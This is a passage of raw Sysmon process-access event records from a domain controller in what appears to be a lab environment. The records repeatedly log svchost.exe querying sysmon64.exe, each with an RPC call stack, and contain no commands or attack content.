SYSTEM32\ntdll.dll+51791 10341000x80000000000000001716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:16.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
